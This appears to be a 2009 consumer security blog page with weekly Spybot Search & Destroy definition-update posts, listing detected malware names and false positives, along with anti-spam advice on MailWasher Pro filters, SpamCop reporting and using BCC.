All of the spam and scams targeting my accounts were either automatically deleted by my custom MailWasher Pro spam filters, or if they made it through, was reported to SpamCop, of which I am a reporting member, and manually deleted. I never buy anything that is Spamvertised and recommend you don't either! Remember, almost all spam is now sent from compromised home or business PCs, zombies in various Botnets, all of which are controlled by criminals. If you purchase anything advertised in spam messages, you have given your credit or debit card information to the criminals behind that enterprise. If you are really lucky you will only be charged for the fake items you purchased, but, if not, you might find your credit limit used up, or your bank account emptied (for debit card transactions), by cyber criminals.

Also, unsubscribing through links in botnet-sent spam messages is futile, as you never opted-in, in the first place; your email address was captured by an email harvester on an infected computer belonging to somebody you corresponded with. Instead of receiving less spam as one might expect (by unsubscribing), all it does is confirm that your email address is active and you will see even more spam than before.

Another common way your email address may get harvested by spammers is if it appears in a large C.C. (Carbon Copy) list on a computer that gets Botnetted. Many people engage in forwarding messages among all their friends. Each time they forward chain letters their address gets added to the growing list of recipients (called Carbon Copy, or CC). If just one recipient of that message has an email harvesting malware infection, all of the email addresses listed in that message will be sent home to the spammer behind that spam run.

Smart folks who want to forward or send a message to multiple recipients use B.C.C. instead of C.C. Using B.C.C. hides all of the recipients from displaying. The To field will just show "Undisclosed Recipients" in a message sent using B.C.C. This is safest for you and your friends or mailing list. All email clients have a means of displaying a B.C.C. field.

Posted by Wiz at 2:33 PM | Permalink

back to top ^

If you use Spybot Search and Destroy to protect your computer against spyware, it is time again to run your manual updates. New definitions and false positive fixes are usually released every Wednesday. This week's updates were released on schedule on April 8, 2009, as listed below.

In case you are new to Spybot S&D, there are two ways to update the program and malware definitions. The preferred method (For Windows PCs) is to go to Start > (All) Programs > Spybot - Search & Destroy > Update Spybot - S&D. The independent update box will open. Leave the default options as is, unless you need all languages or want beta definitions, and click on "Search." Another box will open with "mirror" locations around the world where you can download updates. Select a location nearest to you from the list and click on "Continue." Make sure all updates are checked, then click on "Download." If all definitions are verified as being correct the check marks will disappear from the check boxes and be replaced with green arrow graphics. However, sometimes one or more mirror locations have not updated all of the definitions and you will get a red X for those definitions. Click on Go Back, select a different mirror, and try again. I have consistent success using Giganet or the Safer-Networking servers.

When all updates have succeeded, click on "Exit." With the program updated it is time to open the main program interface, using either the Start Menu link, or a desktop icon, to launch Spybot Search and Destroy. The next item to take care of is to apply Immunization. Click on the Immunize button in the left sidebar, select everything you want, or uncheck things like cookies, or Hosts, or Domains, as you see fit, then click on Immunize button over the right panel, that has a green cross. After immunizing against unwanted items you should click on the Search &Destroy icon, on the left, then click "Check for problems," on the right side.

It will take several minutes, or longer to scan all your files for known threats, and possible threats, using heuristics, unless you disable heuristics in the program's main Advanced Mode > Settings. When the scan completes anything listed in the definition databases will be listed in the results window, with check boxes in front of each main item group. If you find the program has listed some cookies or other programs you use and trust, uncheck them, click on the item name and the right click and select "Exclude this product from further searches." Finally, click on "Fix (selected) Problems."

Spybot Search and Destroy 1.6.2 was released on January 26, 2009. This is probably going to be the last "maintenance release" before version 2.0 is released. It scans for threats about 4 times faster than previous versions and has an redesigned spyware removal engine. Upgrade now to Spybot S&D 1.6.2. The newest Virtumonde and Zlob threats require the anti malware engine in Spybot 1.6+ to effectively remove them.

Also, the TeaTimer module was recently updated to version 1.6.6. If you use the Spybot Tea Timer you may want install this update (as an administrator) (Or maybe not! See notes below concerning false positives in TeaTimer.).

Additions made on April 8, 2009:

Malware (Includes rogue or fake anti-virus and anti-spyware programs and fake registry cleaners and fake security alerts, plus other nasty programs)
+ DNSFlush.cws
+ Fraud.AntiSpywarePro
+ Fraud.AntivirusPlus
+ Fraud.SysCleanerPro
+ Fraud.SystemGuard2009
+ Fraud.SystemSecurity
+ Fraud.XPAntivirus
+ Goldun
+ Smitfraud-C.
+ Spambot.mib

PUPS (Possibly UnPopular Software or Potentially Unwanted Program)Spyware
+ Win32.Iksmas.ai

Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors and Rootkits.)
+ Virtumonde.atr
+ Virtumonde.sci
+ Virtumonde.sdn
+ Win32.Agent.pa
+ Win32.Bredolab.B
+ Win32.Buzus
+ Win32.KillAV-KQ
+ Win32.Rbot.fx
+ Win32.TDSS.pe
+ Win32.TDSS.qa
+ Win32.TDSS.rtk
+ Win32.ZBot
+ Zlob.VideoBox

Total: 1560284 fingerprints in 496663 rules for 4610 products

False positive detections reported or fixed this week:

Team Spybot has yet to respond to a reported possible false positive detection of "Royal.Dice.Casino.PT" in C:\Program Files\Java\jre6\bin\jqs.exe.

A false positive detection of "Fraud Virus Doctor," by the updated TeaTimer module, has been reported by several people in various files and folders, all of which are confirmed false positives.

A false positive detection of "PerfectKeylogger," in WD Drive Manager Setup, was confirmed and will be fixed.

There was a confirmed false positive detection of "Italian Frameless" in Microsoft Office OutlookConnector.exe. Disregard this alert and don't let it delete the file.

I recommend NOT installing the TeaTimer module at this time! There are just too many false positives since the updated version was released. If you are unsure about the validity of a TeaTimer pop-up alert regarding a process having been terminated, do not select the option to delete the file.

You should send feedback about TeaTimer false positives to Team Spybot, after registering with the Safer-Networiking forum.

If you have purchased McAfee, Symantec, or Trend Micro security suites (which are very good products) and they ask you to uninstall Spybot, or do so without your option to refuse, simply reinstall Spybot afterward. But, I recommend not activating the TeaTimer module in Spybot S&D, as this will cause a struggle over which program monitors the system for realtime changes.

Extended Comments

Various reports from the Internet and from Safer-Networking's own testing seem to indicate that there is a problem between Internet Explorer 8 and the immunization feature of Spybot - Search & Destroy, causing a slow startup of IE 8. It is caused by the large number of websites added to the browser's Restricted Sites Zone. This is being worked on by Team Spybot.

Team Spybot has changed the name of the Spybot S&D setup file. The installer file that is downloaded to the desktop during a main update (to allow you to see the file and store it elsewhere if you want) is now named setup-spybotsd162.exe instead of spybotsd162.exe to avoid confusion with the regular Spybot... start link. The new naming convention should continue with future releases.

If you arrived here by searching for the name of some malware that may be on your computer and you are not currently using Spybot Search and Destroy, you can download the latest version from the Spybot Search and Destroy Multi-Lingual Landing Page. Choose your language, then use the link in the left sidebar to go to the downloads page. Download the program from your closest mirror server, install it, update it (Updates button), then follow the instructions below to detect and remove any malware that is on your PC. If Spybot is unable to remove an active threat it will ask for permission to run before Windows starts during the next reboot. Spybot will then run a complete scan before your Windows desktop loads, removing malware that has not yet loaded into memory.

If you see a program listed in the new detections, by its name, you should assume that is is malware (with the possible exception of the PUP group, which is up to user discretion). All of the programs listed with a single + sign are updated detections, while a double ++ in front of it's name indicates a brand new detection. A number in parenthesis, following a malware name, indicates the number of variants included in that detection. These programs are dangerous to your computer, and/or personal security or privacy.

The domain "Spywareinfo.com" and TrafficZ was recently added to the HOSTS file updates (for redirection to 127.0.0.1), because the domain name expired and was purchased by spammers or malware distributers, in December 2008. It is now advertising a fake Spybot Search & Destroy, fake security scans and various malware downloads. The new Spywareinfo malware removal forum is located at: http://www.spywareinfoforum.com/

Note for Firefox users who saved links to the old spywareinfo website:
It has recently (Feb/09) been reported that in some versions of Spybot S&D, on some operating systems, if you have a link to the old spywareinfo website, now owned by purveyors of fake anti spyware products and scanners, "fixing" it will erase your entire Bookmarks.html file. This is being looked into right now and hopefully will be fixed real soon. In the meantime, if you use Firefox as your browser (which stores Favorite places as "Bookmarks") and after running a scan Spybot lists an infected bookmark with Spywareinfo as the culprit, uncheck that entry before fixing any other problems. You can manually edit your Firefox Bookmarks to remove the link to that website, or any similar compromised website.

Malware Removal Guides

The good folks at Spybot S&D have started a new segment of their official forums, titled "Malware Removal Guides." Each week they intend to write a short self-help article to help you remove various common malware threats manually, or in conjunction with Spybot S&D. This should prove to be a very useful addition to the Spybot forums. The latest addition is Manual Removal Guide for Win32.TDSS.qa.

If you are still using Spybot S&D 1.3, or 1.4, update support is about to end and your computer will be at greater risk because of having out-dated definitions. Furthermore, older versions of Spybot are known to report lots of false positives, due to the advanced heuristic rules now found in the newer definition files.

If you are using any version older than 1.6 please upgrade to the current version of Spybot S&D, which is now 1.6.2, as soon as possible. New definitions for malware like the Virtumonde family of Trojans need the newer processing technologies introduced in version 1.6.0. Also, the number of malware definitions has more than doubled between July and December, 2008.

Work is progressing at a steady pace on Spybot S&D version 2.0, thanks to an army of volunteer beta testers. The upcoming version will be modularized, with separate executables carrying out different detection and immunization tasks now performed by the main program file. This is expected to speed up the scanning times, which is becoming more strenuous with the rapid increase in the number of detections being developed by Team Spybot.

To benefit from these improvements, I recommend that you update to Spybot Search & Destroy 1.6.2, which is available through the update function integrated into the application as well as from the Spybot S&D download page. When version 2.0 is finally released you should follow the to-be-posted instructions and upgrade to that version.

If your computer gets stuck in a logon/logoff loop, after updating and scanning with the older versions of Spybot, visit this forum page for a solution, from Team Spybot.

Of continued concern to people who operate as Limited or Power Users for their daily browsing and email, Spybot Search and Destroy is still corrupting your less privileged accounts after you update it, immunize and scan from an Administrator level account. If, after doing these things, you log off the Administrator account and try to log into your Limited/Power User account, it may be corrupted and a generic desktop and start menu may appear. Don't panic! Your account and desktop can be restored by simply rebooting the computer. When you login after the reboot your previous settings will reappear. I don't know why this happens, but, stuff happens! It may be related to the relatively new rootkit detection added last year.

If you want to get direct assistance from Team Spybot, or their talented volunteers, visit the Spybot support forums, sign up for a user account and post your request for assistance. Be sure to read the rules before posting a question or reply.

If your computer is infected and you need help removing the threats, go to the Malware Removal Forums, at Safer Networking/Spybot.info. Again, read the rules before posting your request or logs! Do NOT inject your problem into somebody else's thread! Start a new topic.

Some people are confused by detections of Wild Tangent on their computers. Wild Tangent is detected as a PUP, meaning Potentially Unwanted Program, because it does send home some identifiable information about you and your computer. It ships with various games and screen savers and is a means of funding those programs. If you knowingly installed Wild Tangent and aren't worried about it, and don't wish to have Spybot repeatedly display it in scan results, do the following: Right click the WildTangent Product in the Scan result and select to "Ignore the product from further searches."

If Spybot flags a file on your computer that you believe is a false positive detection, use caution and check with the Spybot False Positives Forum before allowing it to be deleted. You can submit a report to the Spybot False Positives forum, after signing up for an account and reading about how to report false positives before submitting your report and request for analysis.

Posted by Wiz at 12:17 PM | Permalink

back to top ^

This is the latest entry in my weekly series about classifications of spam, according to my custom filter rules used by MailWasher Pro. The categories are shown on the "Statistics" page > "Junk Mail," as a pie chart, based on my custom filters and blacklist. The amount of email flagged as spam is shown on the "Summary" page of Statistics.

If you use MailWasher Pro you can enable the Blacklist function and add some pattern matching blacklist filters to automatically delete spam messages containing a forged From address matching either of these Regular Expressions: lin+met@+.de and kef+diz@+, in MailWasher Pro. The interesting fact about those two rules is that the same forged domain name prefix is used on both sides of the @ symbol. So, if you see an incoming email with a sender listed as kefsomedomaindiz@somedomain.com it will match that rule.

I am seeing a greatly reduced amount of spam, possibly due to me being white-listed by spammers, trying to avoid my honeypots. Nonetheless, the types of spam I am getting are most likely the same types you are getting, just in a different quantity. The classifications can help you adjust your email filters according to what is most common, on a weekly basis.

MailWasher Pro spam category breakdown for March 30 - April 5, 2009. Spam amounted to 6% of my incoming email this week.

Download MailWasher Pro Here

If you are reading this and wondering what you can do to reduce the sometimes huge volumes of spam emails that must be overwhelming your POP client inboxes, I recommend MailWasher Pro (with my downloadable custom filters) as an incoming email screener for your POP email program (Microsoft Outlook, Microsoft Outlook Express, Microsoft/Windows Live Mail, Eudora, Mozilla and other stand-alone email programs).

To protect your computer from malware in email attachments, dangerous links to hostile web pages, JavaScript redirects, Phishing scams, or router DNS attack codes, I recommend Trend Micro Internet Security.

All of the spam and scams targeting my accounts were either automatically deleted by my custom MailWasher Pro spam filters, or if they made it through, was reported to SpamCop, of which I am a reporting member, and manually deleted. I never buy anything that is Spamvertised and recommend you don't either! Remember, almost all spam is now sent from compromised home or business PCs, zombies in various Botnets, all of which are controlled by criminals. If you purchase anything advertised in spam messages, you have given your credit or debit card information to the criminals behind that enterprise. If you are really lucky you will only be charged for the fake items you purchased, but, if not, you might find your credit limit used up, or your bank account emptied (for debit card transactions), by cyber criminals.

Also, unsubscribing through links in botnet-sent spam messages is futile, as you never opted-in, in the first place; your email address was captured by an email harvester on an infected computer belonging to somebody you corresponded with. Instead of receiving less spam as one might expect (by unsubscribing), all it does is confirm that your email address is active and you will see even more spam than before.

Another common way your email address may get harvested by spammers is if it appears in a large C.C. (Carbon Copy) list on a computer that gets Botnetted. Many people engage in forwarding messages among all their friends. Each time they forward chain letters their address gets added to the growing list of recipients (called Carbon Copy, or CC). If just one recipient of that message has an email harvesting malware infection, all of the email addresses listed in that message will be sent home to the spammer behind that spam run.

Smart folks who want to forward or send a message to multiple recipients use B.C.C. instead of C.C. Using B.C.C. hides all of the recipients from displaying. The To field will just show "Undisclosed Recipients" in a message sent using B.C.C. This is safest for you and your friends or mailing list. All email clients have a means of displaying a B.C.C. field.

Posted by Wiz at 4:39 PM | Permalink

back to top ^

If you use Spybot Search and Destroy to protect your computer against spyware, it is time again to run your manual updates. New definitions and false positive fixes are usually released every Wednesday. This week's updates were released on schedule on April 1, 2009, as listed below.

In case you are new to Spybot S&D, there are two ways to update the program and malware definitions. The preferred method (For Windows PCs) is to go to Start > (All) Programs > Spybot - Search & Destroy > Update Spybot - S&D. The independent update box will open. Leave the default options as is, unless you need all languages or want beta definitions, and click on "Search." Another box will open with "mirror" locations around the world where you can download updates. Select a location nearest to you from the list and click on "Continue." Make sure all updates are checked, then click on "Download." If all definitions are verified as being correct the check marks will disappear from the check boxes and be replaced with green arrow graphics. However, sometimes one or more mirror locations have not updated all of the definitions and you will get a red X for those definitions. Click on Go Back, select a different mirror, and try again. I have consistent success using Giganet or the Safer-Networking servers.

When all updates have succeeded, click on "Exit." With the program updated it is time to open the main program interface, using either the Start Menu link, or a desktop icon, to launch Spybot Search and Destroy. The next item to take care of is to apply Immunization. Click on the Immunize button in the left sidebar, select everything you want, or uncheck things like cookies, or Hosts, or Domains, as you see fit, then click on Immunize button over the right panel, that has a green cross. After immunizing against unwanted items you should click on the Search &Destroy icon, on the left, then click "Check for problems," on the right side.

It will take several minutes, or longer to scan all your files for known threats, and possible threats, using heuristics, unless you disable heuristics in the program's main Advanced Mode > Settings. When the scan completes anything listed in the definition databases will be listed in the results window, with check boxes in front of each main item group. If you find the program has listed some cookies or other programs you use and trust, uncheck them, click on the item name and the right click and select "Exclude this product from further searches." Finally, click on "Fix (selected) Problems."

Spybot Search and Destroy 1.6.2 was released on January 26, 2009. This is probably going to be the last "maintenance release" before version 2.0 is released. It scans for threats about 4 times faster than previous versions and has an redesigned spyware removal engine. Upgrade now to Spybot S&D 1.6.2. The newest Virtumonde and Zlob threats require the anti malware engine in Spybot 1.6+ to effectively remove them.

Also today, the TeaTimer module was updated to version 1.6.6. If you use the Spybot Tea Timer you should install this update (as an administrator) (or maybe not! see notes below.).

Additions made on April 1, 2009:

Malware (Includes rogue or fake anti-virus and anti-spyware programs and fake registry cleaners and fake security alerts, plus other nasty programs)
+ CMVideo
+ Fraud.Antivirus360
+ Fraud.AntivirusXP
+ Fraud.GeneralAntivirus
+ Fraud.PCHealth
+ Fraud.VirusDoctor
+ Fraud.XPAntivirus
+ WMVideoPlugin
+ Win32.Delf.oc

PUPS (Possibly UnPopular Software or Potentially Unwanted Program)
+ WindowsPerformance

Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors and Rootkits.)
+ Virtumonde.atr
+ Virtumonde.sci
+ Virtumonde.sdn
+ Win32.Tofsee.f
+ Win32.ZBot
+ Zlob.Downloader

Total: 1537030 fingerprints in 488763 rules for 4592 products.

False positive detections reported or fixed this week:

Team Spybot has yet to respond to a reported possible false positive detection of "Royal.Dice.Casino.PT" in C:\Program Files\Java\jre6\bin\jqs.exe.

A false positive detection of "Fraud Virus Doctor" - in c:\hp\kbd\kbd.exe - was confirmed in TeaTimer.

TeaTimer again! False Positive confirmed with Keepass's Plugin KeeForm, labeled as Spambot.mib by TeaTimer

Again, TeaTimer: A false positive was confirmed and fixed for mIRC 6.0.3 reported as IRC.Zapchast.

Another false positive detection by TeaTimer. TSCash in C:\Garmin\Spanner.exe. Fixed with today's updates.

Here's another one: A false positive was reported of "PerfectKeylogger" in C:\Documents and Settings\All Users.WINDOWS\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\mbam-setup.exe.

I recommend NOT installing the TeaTimer module at this time!

There was a confirmed false positive detection of "Italian Frameless" in Microsoft Office OutlookConnector.exe. It is being investigated but cannot be reproduced by Team Spybot.

If you have purchased McAfee, Symantec, or Trend Micro security suites (which are very good products) and they ask you to uninstall Spybot, or do so without your option to refuse, simply reinstall Spybot afterward. But, I recommend not activating the TeaTimer module in Spybot S&D, as this will cause a struggle over which program monitors the system for realtime changes.

Extended Comments

Various reports from the Internet and from Safer-Networking's own testing seem to indicate that there is a problem between Internet Explorer 8 and the immunization feature of Spybot - Search & Destroy, causing a slow startup of IE 8. It is caused by the large number of websites added to the browser's Restricted Sites Zone. This is being worked on by Team Spybot.

Team Spybot has changed the name of the Spybot S&D setup file. The installer file that is downloaded to the desktop during a main update (to allow you to see the file and store it elsewhere if you want) is now named setup-spybotsd162.exe instead of spybotsd162.exe to avoid confusion with the regular Spybot... start link. The new naming convention should continue with future releases.

If you arrived here by searching for the name of some malware that may be on your computer and you are not currently using Spybot Search and Destroy, you can download the latest version from the Spybot Search and Destroy Multi-Lingual Landing Page. Choose your language, then use the link in the left sidebar to go to the downloads page. Download the program from your closest mirror server, install it, update it (Updates button), then follow the instructions below to detect and remove any malware that is on your PC. If Spybot is unable to remove an active threat it will ask for permission to run before Windows starts during the next reboot. Spybot will then run a complete scan before your Windows desktop loads, removing malware that has not yet loaded into memory.

If you see a program listed in the new detections, by its name, you should assume that is is malware (with the possible exception of the PUP group, which is up to user discretion). All of the programs listed with a single + sign are updated detections, while a double ++ in front of it's name indicates a brand new detection. A number in parenthesis, following a malware name, indicates the number of variants included in that detection. These programs are dangerous to your computer, and/or personal security or privacy.

The domain "Spywareinfo.com" and TrafficZ was recently added to the HOSTS file updates (for redirection to 127.0.0.1), because the domain name expired and was purchased by spammers or malware distributers, in December 2008. It is now advertising a fake Spybot Search & Destroy, fake security scans and various malware downloads. The new Spywareinfo malware removal forum is located at: http://www.spywareinfoforum.com/

Note for Firefox users who saved links to the old spywareinfo website:
It has recently (Feb/09) been reported that in some versions of Spybot S&D, on some operating systems, if you have a link to the old spywareinfo website, now owned by purveyors of fake anti spyware products and scanners, "fixing" it will erase your entire Bookmarks.html file. This is being looked into right now and hopefully will be fixed real soon. In the meantime, if you use Firefox as your browser (which stores Favorite places as "Bookmarks") and after running a scan Spybot lists an infected bookmark with Spywareinfo as the culprit, uncheck that entry before fixing any other problems. You can manually edit your Firefox Bookmarks to remove the link to that website, or any similar compromised website.

Malware Removal Guides

The good folks at Spybot S&D have started a new segment of their official forums, titled "Malware Removal Guides." Each week they intend to write a short self-help article to help you remove various common malware threats manually, or in conjunction with Spybot S&D. This should prove to be a very useful addition to the Spybot forums. The latest addition is Manual Removal Guide for Win32.TDSS.qa.

If you are still using Spybot S&D 1.3, or 1.4, update support is about to end and your computer will be at greater risk because of having out-dated definitions. Furthermore, older versions of Spybot are known to report lots of false positives, due to the advanced heuristic rules now found in the newer definition files.

If you are using any version older than 1.6 please upgrade to the current version of Spybot S&D, which is now 1.6.2, as soon as possible. New definitions for malware like the Virtumonde family of Trojans need the newer processing technologies introduced in version 1.6.0. Also, the number of malware definitions has more than doubled between July and December, 2008.

Work is progressing at a steady pace on Spybot S&D version 2.0, thanks to an army of volunteer beta testers. The upcoming version will be modularized, with separate executables carrying out different detection and immunization tasks now performed by the main program file. This is expected to speed up the scanning times, which is becoming more strenuous with the rapid increase in the number of detections being developed by Team Spybot.

To benefit from these improvements, I recommend that you update to Spybot Search & Destroy 1.6.2, which is available through the update function integrated into the application as well as from the Spybot S&D download page. When version 2.0 is finally released you should follow the to-be-posted instructions and upgrade to that version.

If your computer gets stuck in a logon/logoff loop, after updating and scanning with the older versions of Spybot, visit this forum page for a solution, from Team Spybot.

Of continued concern to people who operate as Limited or Power Users for their daily browsing and email, Spybot Search and Destroy is still corrupting your less privileged accounts after you update it, immunize and scan from an Administrator level account. If, after doing these things, you log off the Administrator account and try to log into your Limited/Power User account, it may be corrupted and a generic desktop and start menu may appear. Don't panic! Your account and desktop can be restored by simply rebooting the computer. When you login after the reboot your previous settings will reappear. I don't know why this happens, but, stuff happens! It may be related to the relatively new rootkit detection added last year.

If you want to get direct assistance from Team Spybot, or their talented volunteers, visit the Spybot support forums, sign up for a user account and post your request for assistance. Be sure to read the rules before posting a question or reply.

If your computer is infected and you need help removing the threats, go to the Malware Removal Forums, at Safer Networking/Spybot.info. Again, read the rules before posting your request or logs! Do NOT inject your problem into somebody else's thread! Start a new topic.

Some people are confused by detections of Wild Tangent on their computers. Wild Tangent is detected as a PUP, meaning Potentially Unwanted Program, because it does send home some identifiable information about you and your computer. It ships with various games and screen savers and is a means of funding those programs. If you knowingly installed Wild Tangent and aren't worried about it, and don't wish to have Spybot repeatedly display it in scan results, do the following: Right click the WildTangent Product in the Scan result and select to "Ignore the product from further searches."

If Spybot flags a file on your computer that you believe is a false positive detection, use caution and check with the Spybot False Positives Forum before allowing it to be deleted. You can submit a report to the Spybot False Positives forum, after signing up for an account and reading about how to report false positives before submitting your report and request for analysis.

Posted by Wiz at 3:11 PM | Permalink

back to top ^